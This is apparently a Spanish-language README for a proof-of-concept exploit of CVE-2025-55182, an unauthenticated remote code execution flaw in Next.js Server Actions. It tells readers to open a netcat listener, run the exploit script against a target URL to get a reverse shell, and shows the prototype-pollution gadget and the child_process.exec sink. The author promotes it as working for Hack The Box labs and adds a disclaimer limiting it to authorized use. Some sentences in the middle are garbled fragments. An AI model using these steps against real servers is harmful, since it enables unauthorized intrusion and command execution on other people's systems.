
Sé que probablemente estás aquí desde Hack the Box; si es así, sí, este realmente funciona.
Una prueba de concepto (PoC) para CVE-2025-55182, que apunta a una vulnerabilidad de Ejecución Remota de Código (RCE) no autenticada en Next.js Server Actions.
Este exploit abusa de la contaminación de prototipos durante la deserialización de cargas útiles multipart de React Server Components (RSC) para inyectar comandos maliciosos en el proceso de Node.js mediante un flujo de ejecución asíncrono y no bloqueante.
child_process.exec() en lugar de las APIs bloqueantes execSync() para evitar bloqueos de hilos en nodos contenedores.requests de Python.Abre una terminal en tu host atacante y abre un listener de socket netcat para capturar la conexión inversa entrante:
nc -lvnp 4444
Proporciona la URL base del objetivo, la IP de tu interfaz local y el puerto de listener deseado:
python3 exploit.py <target_url> <your_ip> [your_port]
python3 exploit.py http://website.whatever:port x.x.x.x 4444
El script envía una carga útil multipart cruda y manipulada directamente al endpoint de enrutamiento de la aplicación con el encabezado de enrutamiento Next-Action requerido.
Al aprovechar las firmas de construcción de objetos mediante {"get":"$1:constructor:constructor"}, el motor de deserialización contamina el árbol de objetos nativo. Al procesar los parámetros adjuntos, interpreta el bloque de contexto _response incrustado maliciosamente como una cola de instrucciones, permitiendo la ejecución de código bajo los privilegios del contexto de usuario del servidor Node en ejecución.
// Vector objetivo subyacente:
process.mainModule.require('child_process').exec('your_payload_here');
Este script se crea estrictamente con fines educativos, pruebas de seguridad autorizadas y captura de banderas vulnerables en laboratorios como Hack The Box. El autor no es responsable de ningún uso indebido, intrusiones no autorizadas en sistemas o daños causados por esta utilidad.